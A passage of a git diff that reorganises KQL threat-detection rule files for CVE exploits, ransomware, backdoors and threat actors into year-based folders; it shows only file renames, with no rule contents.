b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2021_40444_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_exploitation_attempt_from_office_application.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql diff --git a/KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/suspicious_word_cab_file_write_cve_2021_40444.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2021_41379_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2021_44077_poc_default_dropped_file.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql rename to KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/suspicious_razerinstaller_explorer_subprocess.kql rename to KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_systemnightmare_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/blackbyte_ransomware_registry.kql rename to KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_blackbyte_ransomware_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql similarity index 100% rename from KQL/rules-emerging-threats/Collection/conti_ntds_exfiltration_command.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/conti_ntds_exfiltration_command.kql diff --git a/KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/conti_volume_shadow_listing.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/conti_volume_shadow_listing.kql diff --git a/KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Impact/potential_conti_ransomware_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_activity.kql diff --git a/KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql b/KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql similarity index 100% rename from KQL/rules-emerging-threats/Collection/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql rename to KQL/rules-emerging-threats/2021/Malware/Conti/potential_conti_ransomware_database_dumping_activity_via_sqlcmd.kql diff --git a/KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql b/KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/darkside_ransomware_pattern.kql rename to KQL/rules-emerging-threats/2021/Malware/DarkSide/darkside_ransomware_pattern.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql rename to KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_malware_reconnaissance.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_related_indicator.kql rename to KQL/rules-emerging-threats/2021/Malware/Devil-Bait/potential_devil_bait_related_indicator.kql diff --git a/KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql b/KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql similarity index 100% rename from KQL/rules-emerging-threats/Resource Development/foggyweb_backdoor_dll_loading.kql rename to KQL/rules-emerging-threats/2021/Malware/FoggyWeb/foggyweb_backdoor_dll_loading.kql diff --git a/KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/goofy_guineapig_backdoor_ioc.kql rename to KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/goofy_guineapig_backdoor_ioc.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_goofy_guineapig_backdoor_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_backdoor_activity.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql b/KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql rename to KQL/rules-emerging-threats/2021/Malware/Goofy-Guineapig/potential_goofy_guineapig_goolgeupdate_process_anomaly.kql diff --git a/KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql b/KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/moriya_rootkit_file_created.kql rename to KQL/rules-emerging-threats/2021/Malware/Moriya-Rootkit/moriya_rootkit_file_created.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql b/KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_netwire_rat_activity_registry.kql rename to KQL/rules-emerging-threats/2021/Malware/Netwire/potential_netwire_rat_activity_registry.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_dll_loading_activity.kql rename to KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_dll_loading_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql b/KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/pingback_backdoor_file_indicators.kql rename to KQL/rules-emerging-threats/2021/Malware/Pingback/pingback_backdoor_file_indicators.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/small_sieve_malware_commandline_indicator.kql rename to KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_commandline_indicator.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/small_sieve_malware_file_indicator_creation.kql rename to KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_file_indicator_creation.kql diff --git a/KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql b/KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/small_sieve_malware_registry_persistence.kql rename to KQL/rules-emerging-threats/2021/Malware/Small-Sieve/small_sieve_malware_registry_persistence.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql b/KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/hafnium_exchange_exploitation_activity.kql rename to KQL/rules-emerging-threats/2021/TA/HAFNIUM/hafnium_exchange_exploitation_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql b/KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/revil_kaseya_incident_malware_patterns.kql rename to KQL/rules-emerging-threats/2021/TA/Kaseya-Supply-Chain/revil_kaseya_incident_malware_patterns.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql b/KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/apt_privatelog_image_load_pattern.kql rename to KQL/rules-emerging-threats/2021/TA/PRIVATELOG/apt_privatelog_image_load_pattern.kql diff --git a/KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql b/KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/sourgum_actor_behaviours.kql rename to KQL/rules-emerging-threats/2021/TA/SOURGUM/sourgum_actor_behaviours.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_cve_2023_21554_queuejumper_exploitation.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-21554/potential_cve_2023_21554_queuejumper_exploitation.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-22954/potential_cve_2022_22954_exploitation_attempt_vmware_workspace_one_access_remote_code_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2022_24527_microsoft_connected_cache_lpe.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-24527/cve_2022_24527_microsoft_connected_cache_lpe.kql diff --git a/KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/atlassian_confluence_cve_2022_26134.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26134/atlassian_confluence_cve_2022_26134.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_cve_2022_26809_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-26809/potential_cve_2022_26809_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2022_29072_exploitation_attempt.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-29072/potential_cve_2022_29072_exploitation_attempt.kql diff --git a/KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql similarity index 100% rename from KQL/rules-emerging-threats/Defense Evasion/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-30190/suspicious_set_value_of_msdt_in_registry_cve_2022_30190_.kql diff --git a/KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/apache_spark_shell_command_injection_processcreation.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-33891/apache_spark_shell_command_injection_processcreation.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql b/KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/suspicious_sysmon_as_execution_parent.kql rename to KQL/rules-emerging-threats/2022/Exploits/CVE-2022-41120/suspicious_sysmon_as_execution_parent.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql b/KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/chromeloader_malware_execution.kql rename to KQL/rules-emerging-threats/2022/Malware/ChromeLoader/chromeloader_malware_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql b/KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/emotet_loader_execution_via_lnk_file.kql rename to KQL/rules-emerging-threats/2022/Malware/Emotet/emotet_loader_execution_via_lnk_file.kql diff --git a/KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql b/KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/hermetic_wiper_tg_process_patterns.kql rename to KQL/rules-emerging-threats/2022/Malware/Hermetic-Wiper/hermetic_wiper_tg_process_patterns.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_raspberry_robin_dot_ending_file.kql rename to KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/potential_raspberry_robin_dot_ending_file.kql diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/raspberry_robin_initial_execution_from_external_drive.kql rename to KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_initial_execution_from_external_drive.kql diff --git a/KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql b/KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/raspberry_robin_subsequent_execution_of_commands.kql rename to KQL/rules-emerging-threats/2022/Malware/Raspberry-Robin/raspberry_robin_subsequent_execution_of_commands.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql b/KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/serpent_backdoor_payload_execution_via_scheduled_task.kql rename to KQL/rules-emerging-threats/2022/Malware/Serpent-Backdoor/serpent_backdoor_payload_execution_via_scheduled_task.kql diff --git a/KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql b/KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/fakeupdates_socgholish_activity.kql rename to KQL/rules-emerging-threats/2022/Malware/SocGholish/fakeupdates_socgholish_activity.kql diff --git a/KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql b/KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Privilege Escalation/potential_actinium_persistence_activity.kql rename to KQL/rules-emerging-threats/2022/TA/ACTINIUM/potential_actinium_persistence_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql b/KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/mercury_apt_activity.kql rename to KQL/rules-emerging-threats/2022/TA/MERCURY/mercury_apt_activity.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_linux_.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-22518/cve_2023_22518_exploitation_attempt_suspicious_confluence_child_process_windows_.kql diff --git a/KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/outlook_task_note_reminder_received.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-23397/outlook_task_note_reminder_received.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-27363/potential_cve_2023_27363_exploitation_hta_file_creation_by_foxitpdfreader.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/potential_moveit_transfer_cve_2023_34362_exploitation_dynamic_compilation_via_csc_exe.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_exe_creation.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_fake_wermgr_execution.kql diff --git a/KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36874/potential_cve_2023_36874_exploitation_uncommon_report_wer_location.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/potential_cve_2023_36884_exploitation_dropped_file.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-36884/potential_cve_2023_36884_exploitation_dropped_file.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_double_extension_file.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-38831/cve_2023_38331_exploitation_attempt_suspicious_winrar_child_process.kql diff --git a/KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql b/KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql similarity index 100% rename from KQL/rules-emerging-threats/Execution/cve_2023_40477_potential_exploitation_rev_file_creation.kql rename to KQL/rules-emerging-threats/2023/Exploits/CVE-2023-40477/cve_2023_40477_potential_exploitation_rev_file_creation.kql diff --git a/KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql b/KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql similarity index 100% rename from KQL/rules-emerging-threats/Initial Access/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql rename to KQL/rules-emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/potential_exploitation_attempt_of_undocumented_windowsserver_rce.kql diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/coldsteel_rat_anonymous_user_process_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_anonymous_user_process_execution.kql diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/coldsteel_rat_cleanup_command_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_cleanup_command_execution.kql diff --git a/KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql b/KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql similarity index 100% rename from KQL/rules-emerging-threats/Persistence/coldsteel_rat_service_persistence_execution.kql rename to KQL/rules-emerging-threats/2023/Malware/COLDSTEEL/coldsteel_rat_service_persistence_execution.kql diff --git a/KQL/rules-emerging-threats/Persistence/potential_coldsteel_persistence_service_dll_creation.kql 